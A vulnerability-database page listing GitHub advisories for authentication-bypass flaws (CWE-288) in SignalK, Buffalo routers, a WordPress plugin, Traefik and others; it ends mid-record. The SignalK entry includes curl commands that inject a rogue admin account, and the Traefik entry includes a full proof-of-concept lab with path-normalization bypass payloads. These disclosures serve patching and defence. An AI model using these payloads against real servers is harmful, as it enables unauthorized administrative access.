CWE-288
AllowedAuthentication Bypass Using an Alternate Path or Channel
Abstraction: Base · Status: Incomplete
The product requires authentication, but the product has an alternate path or channel that does not require authentication.
1072 vulnerabilities reference this CWE, most recent first.
GHSA-X8HC-FQV3-7GWF
Vulnerability from github – Published: 2026-04-03 21:37 – Updated: 2026-04-03 21:37Summary
According to SignalK's security documentation, when a server is first initialized without security enabled, the /skServer/enableSecurity endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.
However, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the /skServer/enableSecurity route remains perpetually open.
Furthermore, the endpoint explicitly trusts the type field provided in the request body, passing it directly into the server's security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.
Vulnerable Root Cause
File: src/serverroutes.ts (Lines 685-754)
if (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {
app.post(
`${SERVERROUTESPREFIX}/enableSecurity`,
(req: Request, res: Response) => {
// ...
function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {
// [!VULNERABLE] Passes the entire JSON request body directly to the security strategy
securityStrategy.addUser(config, request.body, (err, theConfig) => {
// ...
})
}
}
// ... No code disables or removes this route after first execution.
// The conditional check on Line 685 only happens during server startup,
File: src/tokensecurity.ts (Lines 980-994)
function addUser(
theConfig: SecurityConfig,
user: { userId: string; type: string; password?: string },
callback: ICallback<SecurityConfig>
): void {
// ...
const newUser: User = {
username: user.userId,
type: user.type // [!VULNERABLE] Blindly trusts the injected "type" field
}
Proof of Concept (PoC)
Simulate Legitimate Initial Setup: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.
curl -X POST http://localhost:3000/skServer/enableSecurity \
-H "Content-Type: application/json" \
-d '{"userId": "admin", "password": "securepassword", "type": "admin"}'
Result: Security enabled
Inject Malicious Admin: Send the exact same request again to create a second, unauthorized admin account. This should ideally be blocked because security was already enabled.
curl -X POST http://localhost:3000/skServer/enableSecurity \
-H "Content-Type: application/json" \
-d '{"userId": "attacker", "password": "password123", "type": "admin"}'
Result: Security enabled (The vulnerability: The server fails to reject the request and creates the second admin).
Verify Both Admins Exist: Login via JWT as the attacker and query the restricted users endpoint.
# Get Token for Attacker
TOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"username": "attacker", "password": "password123"}' | jq -r .token)
# Access Admin-Only Data
curl -H "Authorization: Bearer $TOKEN" http://localhost:3000/skServer/security/users
Result: The system returns both admin and attacker as active Administrators.
Security Impact
An unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "signalk-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.24.0-beta.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33950"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-288",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T21:37:19Z",
"nvd_published_at": "2026-04-02T17:16:22Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nAccording to SignalK\u0027s security documentation, when a server is first initialized without security enabled, the **/skServer/enableSecurity** endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.\n\nHowever, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the **/skServer/enableSecurity** route remains perpetually open.\n\nFurthermore, the endpoint explicitly trusts the **type** field provided in the request body, passing it directly into the server\u0027s security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.\n\n## Vulnerable Root Cause \n\nFile: src/serverroutes.ts (Lines 685-754)\n```\nif (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {\n app.post(\n `${SERVERROUTESPREFIX}/enableSecurity`,\n (req: Request, res: Response) =\u003e {\n // ...\n function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {\n // [!VULNERABLE] Passes the entire JSON request body directly to the security strategy\n securityStrategy.addUser(config, request.body, (err, theConfig) =\u003e {\n // ...\n })\n }\n }\n // ... No code disables or removes this route after first execution.\n // The conditional check on Line 685 only happens during server startup, \n```\n\nFile: src/tokensecurity.ts (Lines 980-994)\n```\nfunction addUser(\n theConfig: SecurityConfig,\n user: { userId: string; type: string; password?: string },\n callback: ICallback\u003cSecurityConfig\u003e\n ): void {\n // ...\n const newUser: User = {\n username: user.userId,\n type: user.type // [!VULNERABLE] Blindly trusts the injected \"type\" field\n }\n```\n\n## Proof of Concept (PoC)\n\n**Simulate Legitimate Initial Setup**: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"userId\": \"admin\", \"password\": \"securepassword\", \"type\": \"admin\"}\u0027\n\nResult: Security enabled\n```\n\n**Inject Malicious Admin**: Send the exact same request again to create a second, unauthorized admin account. This should ideally be blocked because security was already enabled.\n\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"userId\": \"attacker\", \"password\": \"password123\", \"type\": \"admin\"}\u0027\n\nResult: Security enabled (The vulnerability: The server fails to reject the request and creates the second admin).\n```\n\n**Verify Both Admins Exist**: Login via JWT as the attacker and query the restricted users endpoint.\n\n```\n# Get Token for Attacker\nTOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"username\": \"attacker\", \"password\": \"password123\"}\u0027 | jq -r .token)\n```\n```\n# Access Admin-Only Data\ncurl -H \"Authorization: Bearer $TOKEN\" http://localhost:3000/skServer/security/users\nResult: The system returns both admin and attacker as active Administrators.\n```\n\n\u003cimg width=\"1205\" height=\"469\" alt=\"Screenshot 2026-03-24 145906\" src=\"https://github.com/user-attachments/assets/98855e54-cb78-4786-a9e3-63dcc1bed37a\" /\u003e\n\n## Security Impact\nAn unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints",
"id": "GHSA-x8hc-fqv3-7gwf",
"modified": "2026-04-03T21:37:19Z",
"published": "2026-04-03T21:37:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950"
},
{
"type": "PACKAGE",
"url": "https://github.com/SignalK/signalk-server"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Signal K Server: Privilege Escalation by Admin Role Injection via /enableSecurity "
}
GHSA-X9GR-C22H-6MQF
Vulnerability from github – Published: 2026-03-27 06:31 – Updated: 2026-03-27 06:31Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication.
{
"affected": [],
"aliases": [
"CVE-2026-32678"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-27T06:16:38Z",
"severity": "HIGH"
},
"details": "Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication.",
"id": "GHSA-x9gr-c22h-6mqf",
"modified": "2026-03-27T06:31:43Z",
"published": "2026-03-27T06:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32678"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN83788689"
},
{
"type": "WEB",
"url": "https://www.buffalo.jp/news/detail/20260323-01.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X9JQ-WH6C-XG75
Vulnerability from github – Published: 2025-02-25 15:34 – Updated: 2026-04-23 15:35Authentication Bypass Using an Alternate Path or Channel vulnerability in Aldo Latino PrivateContent. This issue affects PrivateContent: from n/a through 8.11.5.
{
"affected": [],
"aliases": [
"CVE-2025-26966"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-25T15:15:29Z",
"severity": "CRITICAL"
},
"details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Aldo Latino PrivateContent. This issue affects PrivateContent: from n/a through 8.11.5.",
"id": "GHSA-x9jq-wh6c-xg75",
"modified": "2026-04-23T15:35:54Z",
"published": "2025-02-25T15:34:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26966"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/private-content/vulnerability/wordpress-privatecontent-plugin-8-11-5-unauthenticated-account-takeover-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XF64-8MW2-4GR2
Vulnerability from github – Published: 2026-06-11 13:26 – Updated: 2026-06-11 13:26Summary
There is a high severity vulnerability in Traefik's StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths — such as admin or internal configuration endpoints — without satisfying the authentication middleware attached to the protected router.
Patches
- https://github.com/traefik/traefik/releases/tag/v2.11.48
- https://github.com/traefik/traefik/releases/tag/v3.6.19
- https://github.com/traefik/traefik/releases/tag/v3.7.3
For more information
If there are any questions or comments about this advisory, please open an issue.
Original Description # Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../) ## Summary A route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`. A request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`. This is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues. This report specifically affects `StripPrefix`. ## Affected Versions Tested | Image | Observed Version | Result | |---|---|---| | `traefik:v2.11` | `v2.11.46` | Affected | | `traefik:v3.6` | `v3.6.17` | Affected | | `traefik:latest` | `v3.7.1` | Affected | ### Lab Contrast | Image | Result | |---|---| | `traefik:v2.10` | Not reproduced in lab | | `traefik:v3.5` | Not reproduced in lab | ## Vulnerable Configuration Pattern The issue appears when: - a broad public route strips a prefix - while a separate protected route is intended to guard internal/admin pathshttp:
routers:
public-api:
rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
entryPoints:
- web
middlewares:
- strip-api
service: backend
protected:
rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
entryPoints:
- web
middlewares:
- auth
service: backend
middlewares:
strip-api:
stripPrefix:
prefixes:
- /api
auth:
basicAuth:
users:
- 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'
services:
backend:
loadBalancer:
servers:
- url: http://backend:9000
## Observed Behavior
### Direct Protected Paths
These are correctly blocked.
| Request | Expected | Observed |
|---|---|---|
| `GET /admin` | Blocked | `401` |
| `GET /internal/config` | Blocked | `401` |
### Expected Public Exclusions
These do not expose protected backend paths.
| Request | Expected | Observed |
|---|---|---|
| `GET /api/admin` | Not routed to protected backend path | `404` |
| `GET /api/internal/config` | Not routed to protected backend path | `404` |
### Bypass Payloads
These reach protected backend paths.
| Request | Observed Status | Backend Receives |
|---|---|---|
| `GET /api../admin` | `200` | `/admin` |
| `GET /api%2e%2e/admin` | `200` | `/admin` |
| `GET /api../internal/config` | `200` | `/internal/config` |
| `GET /api%2e%2e/internal/config` | `200` | `/internal/config` |
## Minimal PoC
### docker-compose.yml
services:
traefik:
image: traefik:v3.7
command:
- --providers.file.filename=/etc/traefik/dynamic.yml
- --entrypoints.web.address=:8080
- --accesslog=true
ports:
- "127.0.0.1:18080:8080"
volumes:
- ./dynamic.yml:/etc/traefik/dynamic.yml:ro
depends_on:
- backend
backend:
image: python:3.12-slim
working_dir: /app
command: python backend.py
volumes:
- ./backend.py:/app/backend.py:ro
expose:
- "9000"
### dynamic.yml
http:
routers:
public-api:
rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
entryPoints:
- web
middlewares:
- strip-api
service: backend
protected:
rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
entryPoints:
- web
middlewares:
- auth
service: backend
middlewares:
strip-api:
stripPrefix:
prefixes:
- /api
auth:
basicAuth:
users:
- 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'
services:
backend:
loadBalancer:
servers:
- url: http://backend:9000
### backend.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class Handler(BaseHTTPRequestHandler):
def log_message(self, fmt, *args):
return
def _json(self, status, obj):
body = json.dumps(obj).encode()
self.send_response(status)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
def do_GET(self):
if self.path == "/admin":
self._json(200, {
"seen_path": self.path,
"secret": "ADMIN_SECRET_REACHED"
})
elif self.path == "/internal/config":
self._json(200, {
"seen_path": self.path,
"secret": "TRAEFIK_LAB_INTERNAL_CONFIG"
})
elif self.path == "/admin/exec":
self._json(200, {
"seen_path": self.path,
"rce_chain_marker": True,
"note": "protected execution endpoint reached"
})
else:
self._json(404, {
"seen_path": self.path,
"secret": None
})
HTTPServer(("0.0.0.0", 9000), Handler).serve_forever()
### poc.py
#!/usr/bin/env python3
from urllib.request import Request, urlopen
from urllib.error import HTTPError
BASE = "http://127.0.0.1:18080"
PATHS = [
"/admin",
"/internal/config",
"/api/admin",
"/api/internal/config",
"/api../admin",
"/api%2e%2e/admin",
"/api../internal/config",
"/api%2e%2e/internal/config",
"/admin/exec",
"/api/admin/exec",
"/api../admin/exec",
"/api%2e%2e/admin/exec",
]
for path in PATHS:
req = Request(BASE + path)
try:
with urlopen(req, timeout=5) as r:
status = r.status
body = r.read().decode(errors="replace")
except HTTPError as e:
status = e.code
body = e.read().decode(errors="replace")
print(f"{path:28} {status} {body[:180]}")
### Run
docker compose up -d
python3 poc.py
## Expected Vulnerable Output
/admin 401
/internal/config 401
/api/admin 404
/api/internal/config 404
/api../admin 200 backend seen_path=/admin
/api%2e%2e/admin 200 backend seen_path=/admin
/api../internal/config 200 backend seen_path=/internal/config
/api%2e%2e/internal/config 200 backend seen_path=/internal/config
/api../admin/exec 200 protected execution endpoint reached
/api%2e%2e/admin/exec 200 protected execution endpoint reached
## Root Cause Hypothesis
The vulnerable behavior appears to be caused by path normalization after prefix stripping.
Incoming path: /api../admin
After StripPrefix("/api"): /../admin
After JoinPath(): /admin
The request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization.
The relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions.
## Security Impact
An unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router.
Potential impact includes:
- Access to protected admin paths
- Access to internal configuration endpoints
- Exposure of secrets returned by internal backends
- Access to protected backend management functionality
- Conditional RCE if the protected backend exposes an execution primitive
In the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive.
This is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality.
## Suggested Severity
Suggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
Scope Changed was selected because the request bypasses Traefik's route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router.
If the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
The issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage.
## Weakness
Primary CWE:
- `CWE-863: Incorrect Authorization`
Related weakness candidates:
- `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize`
- `CWE-22: Improper Limitation of a Pathname to a Restricted Directory`
## Mitigation Verified in Lab
The bypass was blocked when using a stricter prefix boundary:
PathRegexp(`^/api(/|$)`)
or:
PathPrefix(`/api/`) with StripPrefix(`/api/`)
## Relation to Existing Advisories
This appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above.
This was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate.
## Reporter
WonYun / kyun0
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.48"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0-ea.1"
},
{
"fixed": "3.7.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48020"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-11T13:26:57Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nThere is a high severity vulnerability in Traefik\u0027s `StripPrefix` middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a `PathPrefix` rule and applies the `StripPrefix` middleware, a request path containing `..` or its percent-encoded form `%2e%2e` can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths \u2014 such as admin or internal configuration endpoints \u2014 without satisfying the authentication middleware attached to the protected router.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.48\n- https://github.com/traefik/traefik/releases/tag/v3.6.19\n- https://github.com/traefik/traefik/releases/tag/v3.7.3\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n# Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../)\n\n## Summary\n\nA route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`.\n\nA request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`.\n\nThis is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues.\n\nThis report specifically affects `StripPrefix`.\n\n## Affected Versions Tested\n\n| Image | Observed Version | Result |\n|---|---|---|\n| `traefik:v2.11` | `v2.11.46` | Affected |\n| `traefik:v3.6` | `v3.6.17` | Affected |\n| `traefik:latest` | `v3.7.1` | Affected |\n\n### Lab Contrast\n\n| Image | Result |\n|---|---|\n| `traefik:v2.10` | Not reproduced in lab |\n| `traefik:v3.5` | Not reproduced in lab |\n\n## Vulnerable Configuration Pattern\n\nThe issue appears when:\n\n- a broad public route strips a prefix\n- while a separate protected route is intended to guard internal/admin paths\n\n```yaml\nhttp:\n routers:\n public-api:\n rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n entryPoints:\n - web\n middlewares:\n - strip-api\n service: backend\n\n protected:\n rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n entryPoints:\n - web\n middlewares:\n - auth\n service: backend\n\n middlewares:\n strip-api:\n stripPrefix:\n prefixes:\n - /api\n\n auth:\n basicAuth:\n users:\n - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n services:\n backend:\n loadBalancer:\n servers:\n - url: http://backend:9000\n```\n\n## Observed Behavior\n\n### Direct Protected Paths\n\nThese are correctly blocked.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /admin` | Blocked | `401` |\n| `GET /internal/config` | Blocked | `401` |\n\n### Expected Public Exclusions\n\nThese do not expose protected backend paths.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /api/admin` | Not routed to protected backend path | `404` |\n| `GET /api/internal/config` | Not routed to protected backend path | `404` |\n\n### Bypass Payloads\n\nThese reach protected backend paths.\n\n| Request | Observed Status | Backend Receives |\n|---|---|---|\n| `GET /api../admin` | `200` | `/admin` |\n| `GET /api%2e%2e/admin` | `200` | `/admin` |\n| `GET /api../internal/config` | `200` | `/internal/config` |\n| `GET /api%2e%2e/internal/config` | `200` | `/internal/config` |\n\n## Minimal PoC\n\n### docker-compose.yml\n\n```yaml\nservices:\n traefik:\n image: traefik:v3.7\n command:\n - --providers.file.filename=/etc/traefik/dynamic.yml\n - --entrypoints.web.address=:8080\n - --accesslog=true\n ports:\n - \"127.0.0.1:18080:8080\"\n volumes:\n - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n depends_on:\n - backend\n\n backend:\n image: python:3.12-slim\n working_dir: /app\n command: python backend.py\n volumes:\n - ./backend.py:/app/backend.py:ro\n expose:\n - \"9000\"\n```\n\n### dynamic.yml\n\n```yaml\nhttp:\n routers:\n public-api:\n rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n entryPoints:\n - web\n middlewares:\n - strip-api\n service: backend\n\n protected:\n rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n entryPoints:\n - web\n middlewares:\n - auth\n service: backend\n\n middlewares:\n strip-api:\n stripPrefix:\n prefixes:\n - /api\n\n auth:\n basicAuth:\n users:\n - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n services:\n backend:\n loadBalancer:\n servers:\n - url: http://backend:9000\n```\n\n### backend.py\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\n\nclass Handler(BaseHTTPRequestHandler):\n def log_message(self, fmt, *args):\n return\n\n def _json(self, status, obj):\n body = json.dumps(obj).encode()\n self.send_response(status)\n self.send_header(\"Content-Type\", \"application/json\")\n self.send_header(\"Content-Length\", str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n\n def do_GET(self):\n if self.path == \"/admin\":\n self._json(200, {\n \"seen_path\": self.path,\n \"secret\": \"ADMIN_SECRET_REACHED\"\n })\n elif self.path == \"/internal/config\":\n self._json(200, {\n \"seen_path\": self.path,\n \"secret\": \"TRAEFIK_LAB_INTERNAL_CONFIG\"\n })\n elif self.path == \"/admin/exec\":\n self._json(200, {\n \"seen_path\": self.path,\n \"rce_chain_marker\": True,\n \"note\": \"protected execution endpoint reached\"\n })\n else:\n self._json(404, {\n \"seen_path\": self.path,\n \"secret\": None\n })\n\nHTTPServer((\"0.0.0.0\", 9000), Handler).serve_forever()\n```\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError\n\nBASE = \"http://127.0.0.1:18080\"\n\nPATHS = [\n \"/admin\",\n \"/internal/config\",\n \"/api/admin\",\n \"/api/internal/config\",\n \"/api../admin\",\n \"/api%2e%2e/admin\",\n \"/api../internal/config\",\n \"/api%2e%2e/internal/config\",\n \"/admin/exec\",\n \"/api/admin/exec\",\n \"/api../admin/exec\",\n \"/api%2e%2e/admin/exec\",\n]\n\nfor path in PATHS:\n req = Request(BASE + path)\n try:\n with urlopen(req, timeout=5) as r:\n status = r.status\n body = r.read().decode(errors=\"replace\")\n except HTTPError as e:\n status = e.code\n body = e.read().decode(errors=\"replace\")\n\n print(f\"{path:28} {status} {body[:180]}\")\n```\n\n### Run\n\n```bash\ndocker compose up -d\npython3 poc.py\n```\n\n## Expected Vulnerable Output\n\n```text\n/admin 401\n/internal/config 401\n/api/admin 404\n/api/internal/config 404\n/api../admin 200 backend seen_path=/admin\n/api%2e%2e/admin 200 backend seen_path=/admin\n/api../internal/config 200 backend seen_path=/internal/config\n/api%2e%2e/internal/config 200 backend seen_path=/internal/config\n/api../admin/exec 200 protected execution endpoint reached\n/api%2e%2e/admin/exec 200 protected execution endpoint reached\n```\n\n## Root Cause Hypothesis\n\nThe vulnerable behavior appears to be caused by path normalization after prefix stripping.\n\n```text\nIncoming path: /api../admin\nAfter StripPrefix(\"/api\"): /../admin\nAfter JoinPath(): /admin\n```\n\nThe request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization.\n\nThe relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions.\n\n## Security Impact\n\nAn unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router.\n\nPotential impact includes:\n\n- Access to protected admin paths\n- Access to internal configuration endpoints\n- Exposure of secrets returned by internal backends\n- Access to protected backend management functionality\n- Conditional RCE if the protected backend exposes an execution primitive\n\nIn the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive.\n\nThis is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality.\n\n## Suggested Severity\n\nSuggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n```\n\nScope Changed was selected because the request bypasses Traefik\u0027s route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router.\n\nIf the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n```\n\nThe issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage.\n\n## Weakness\n\nPrimary CWE:\n\n- `CWE-863: Incorrect Authorization`\n\nRelated weakness candidates:\n\n- `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize`\n- `CWE-22: Improper Limitation of a Pathname to a Restricted Directory`\n\n## Mitigation Verified in Lab\n\nThe bypass was blocked when using a stricter prefix boundary:\n\n```text\nPathRegexp(`^/api(/|$)`)\n```\n\nor:\n\n```text\nPathPrefix(`/api/`) with StripPrefix(`/api/`)\n```\n\n## Relation to Existing Advisories\n\nThis appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above.\n\nThis was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate.\n\n## Reporter\n\nWonYun / kyun0\n\n\u003c/details\u003e",
"id": "GHSA-xf64-8mw2-4gr2",
"modified": "2026-06-11T13:26:57Z",
"published": "2026-06-11T13:26:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2"
},
{
"type": "PACKAGE",
"url": "https://github.com/traefik/traefik"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.48"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.19"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Traefik has a StripPrefix Route-Level Auth Bypass via Path Normalization"
}
GHSA-XF78-WQH9-3PWP
Vulnerability from github – Published: 2022-11-09 12:00 – Updated: 2022-11-10 12:01Unauthorized access to Gateway user capabilities
{
"affected": [],
"aliases": [
"CVE-2022-27510"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-08T22:15:00Z",
"severity": "CRITICAL"
},
"details": "Unauthorized access to Gateway user capabilities",
"id": "GHSA-xf78-wqh9-3pwp",
